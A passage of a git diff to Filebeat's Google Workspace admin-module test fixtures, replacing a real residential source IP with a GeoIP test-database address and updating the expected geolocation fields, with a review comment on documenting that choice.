"source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -665,7 +617,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -677,27 +629,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5598, + "log.offset": 5586, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log index b078b332402e..164c64906f56 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log 
@@ -1,4 +1,4 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json
index 34699ff68eaf..2251f84cf3a2 100644
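Review bot: The replacement address `67.43.156.13` is a publicly routable IP rather than an RFC 5737 documentation address (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), and nothing in the fixture records why it was chosen; the matching expected output (AS 35908, Bhutan, lat 27.5 / lon 90.5, no organization or city) looks like an entry from the GeoLite2 sample database the geoip processor is tested against, which a documentation-range address would not resolve in. Because these `.json.log` fixtures are bare JSON lines with no comment syntax, I would record that rationale in a short README next to the fixtures (or in the module's test notes), e.g. `Fixture IPs use 67.43.156.13 because it resolves in the GeoIP test database; do not replace it with a real or RFC 5737 address.` The removed `98.235.162.24` was enriched as a Comcast Cable Communications residential block in State College, PA, which is exactly the kind of real-world endpoint that should not sit in a public repository, so a note prevents a future contributor from reintroducing an arbitrary real address when adding cases. The same substitution is repeated across the other fixture files in this diff and the note would cover all of them.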
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json @@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -23,23 +23,19 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -60,7 +56,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -72,26 +68,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 384, + "log.offset": 383, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -113,7 +105,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -125,26 +117,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 768, + "log.offset": 766, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -166,7 +154,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -185,26 +173,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 1152, + "log.offset": 1149, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log index 9c3bd721f397..cec0118eed77 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log 
@@ -1,21 +1,21 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
